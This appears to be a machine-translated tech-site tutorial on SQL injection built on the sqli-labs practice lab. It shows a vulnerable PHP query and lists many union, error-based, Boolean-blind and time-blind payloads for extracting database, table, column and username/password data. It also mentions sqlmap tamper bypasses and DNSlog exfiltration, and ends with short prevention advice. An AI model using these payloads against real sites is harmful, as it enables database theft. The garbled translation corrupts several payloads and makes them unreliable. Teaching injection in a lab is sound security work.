Shulou(Shulou.com)06/01 Report--

This article mainly explains "the principle of SQL injection vulnerability". The content of the article is simple and clear, and it is easy to learn and understand. Please follow the editor's train of thought to study and learn "the principle of SQL injection vulnerability".

An example of the principle of vulnerability

After the user submits the data, the back-end server brings the data submitted by the user into the sql statement to operate on the database. If it is not filtered, then the user submits the constructed special statement and can perform illegal operations on the database, that is, trigger sql injection, such as the following code (sqli-labs-1).

/ / GET gets the value of name as id and assigns it to the $id variable; $id=$_GET ['id']; / / defines the $sql variable, which is the sql statement to be executed next, and brings the $id variable into the sql statement; $sql= "SELECT * FROM user WHERE id='$id' LIMIT 0J 1"; / / brings the value of the $sql variable defined in the previous step into the database query as a sql statement, and assigns the result to the $result variable, and the database query function provided by mysql_query for php $result=mysql_query ($sql); / / A row from the result set of the previous query is returned as an array and assigned to the $row variable; $row = mysql_fetch_array ($result); / / if the $row value is not empty, that is, the database query data is normal, the username and password values are printed; if ($row) {echo 'Your Login name:'. $row ['username']; echo "

"; echo 'Your Password:'. $row [' password']; echo";} else {echo''; print_r (mysql_error ()); echo";}}

The data in the database is as follows

If the id=-1 is submitted by the user, then the database will query normally and output normally.

But if the data submitted by the user is

? id=-1' union select 1, 2, and database ()-- +

Then it will return the value returned by the query operation on the database by the statement we constructed.

We compare the two submitted data into our backend execution, as follows

Original statement: SELECT * FROM user WHERE id='$id' LIMIT 0Power1 brings in data normally: SELECT * FROM user WHERE id='1' LIMIT 0Power1 illegally brings in data: SELECT * FROM user WHERE id='-1' union select 1Magna 2 LIMIT database ()-- + 'LIMIT 0Power1 Lili-- (Note: when executing a sql statement, "-" is a comment character in the sql statement, but when used-- there must be a space after the comment, otherwise an error will be reported. The + sign here becomes a space after processing, which is used to separate it from the following single quotation marks in order to comment the following statement. )

As you can see, if the illegal data submitted by the user is brought to the backend for execution without filtering, the real statement executed is SELECT * FROM user WHERE id='-1' union select 1, LIMIT 0Power1, and the later annotated part is not executed, then an error will not be raised. After the query id field value is-1, the union query will be executed to query the database name and output. This is the most typical sql injection.

Vulnerability classification

Instead of classifying them according to numeric characters, I think it is easier to understand them according to the way they are used.

Have echo

Union query # federated query injection, query results are obtained through union federated query Error based # error injection, query results are obtained through error information

No echo

Boolean based blind # Boolean blind injection, by applying different values returned to determine whether the condition is true or false, Time based blind # time blind injection, and manual detection of true or false vulnerability detection through different time delay inference condition

The submitted parameter interacts with the database, adding "'" (English single quotation marks) to the parameter, and there is an exception (sql syntax error), that is, there is sql injection. If there is no echo, you can check for vulnerabilities by delay or Boolean blind injection.

Note: the reason for the exception is that the backend brings the single quotation marks in the parameters into the sql statement for database operation, and an extra single quote causes sql syntax errors, so the error indicates that our single quotation marks entered the execution of the sql statement.

Tool detection

Use sqlmap for detection. Here is the download address and instructions for use. Click Jump.

Vulnerability exploits manual injection

There is an echo construction statement to query the data, and no echo to make a blind note, but it takes time.

Here, take mysql's database and sqli-labs 's less-1 as an example to list some commonly used sentences. If you want to elaborate on them, the length will certainly be very long. I'm afraid you can't read an article. You can use more sentences when you need to use more sentences. If necessary, you can separate the detailed articles about how to inject them.

UNION joint query injection burst number:? id=-1' order by Nmuri + (if "n" to a few errors are not reported, there will be 1 column) burst library name:? id=-1' union select 1, table_name 2) database ()-- + burst shows:? id=-1' union select 1, table_name, groupconcat (table_name) burst, + burst name:? id=-1' union select 1, 2? Group_concat (column_name) from information_schema.columns where table_name='users'-+ burst data:? id=-1' union select 1 username group concat (username), group_concat (password) from users-- + Note: modify the number of fields (number of columns) and the table name of the library according to the actual needs. The number of fields in the union query needs to be the same as the number of fields in the table before you can report an error injection burst library name:? id=-1' union select count (*), count (*), concat ('~', (select database ()),'~', floor (rand () * 2)) as a from information_schema.tables group by AUV + burst table name:? id=-1' union select count (*), count (*), concat ('~') (select concat (table_name) from information_schema.tables where table_schema=database () limit 3Power1),'~', floor (rand (0) * 2) as a from information_schema.tables group by Amuri + exploding names:? id=-1' union select count (*), 1, concat ('~', (select column_name from information_schema.columns where table_name='users' limit 1 ~ ~),'~' Floor (rand (0) * 2) as a from information_schema.tables group by Amure + explosion data:? id=-1' union select count (*), 1, concat ('~', (select concat_ws (':', username,password) from users limit 1),'~', floor (rand (0) * 2) as a from information_schema.tables group by Amura + time blind blasting library length:? id=1' and if (length (database ()) = 8 id=1' and if sleep (5)) NULL)-- + library name:? id=1' and if (left (database (), 1) ='s users' limit left (5), NULL)-- + exploding table name:? id=1' and if (left ((select table_name from information_schema.tables where table_schema=database () limit 1), 1)) = 'rang left (5), NULL)-- + lists:? id=1' and if ((select column_name from information_schema.columns where table_name =' users' limit 1), 8) = 'username' Sleep (5), NULL)-- + explosion data:? id=1' and if (left (select username from users order by id limit 0) 1), 4) = 'dumb',sleep (5), NULL)-- +? id=1' and if (left (select password from users order by id limit 0) 1), 4) =' dumb',sleep (5), NULL)-- + Boolean blind blasting library name:? id=1' and left ((select database () 1) = 'select column_name from information_schema.columns where table_name='users' limit id=1' and left + burst name:? id=1' and left ((select table_name from information_schema.tables where table_schema =' select username from users order by id limit 3jue 1), 5) = 'users'--+ burst list:? id=1' and left ((select column_name from information_schema.columns where table_name='users' limit 1), 8) =' username'--+ burst data:? id=1' and left ((select username from users order by id limit 0) 1), 4) = 'dumb'--+

Another way to make use of the non-echo is to use the content of the query taken out by DNSlog. Here is a master who has explained it in detail. Click to view the original text.

The above is GE type injection, post type is similar, you can modify the parameter values.

Tool injection

Is still a sqlmap shuttle, actual combat according to the actual needs of the use of tamper to bypass some filtering.

Common scene

User-controllable parameters interact with the database, common and query, login, etc.

In the test, you can crawl some api query interfaces of the website, and there will also be sql injection.

Vulnerability Prevention WAF (web Application Firewall)

Adding waf to a website can not fix sql injection vulnerabilities, but it can intercept sensitive data to prevent sql injection from being exploited by hackers.

Filter filtering

Add filtering code on the server side to filter sensitive characters that may trigger sql injection

Sql precompilation

Example:

Prepare baizesec from 'select username,password from users where id=?' ; define the precompiled statement set @ axi1; pass the parameter execute baizesec using @ a; call thank you for reading. This is the content of "the principle of SQL injection vulnerability". After the study of this article, I believe you have a deeper understanding of the principle of SQL injection vulnerability, and the specific usage needs to be verified in practice. Here is, the editor will push for you more related knowledge points of the article, welcome to follow!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.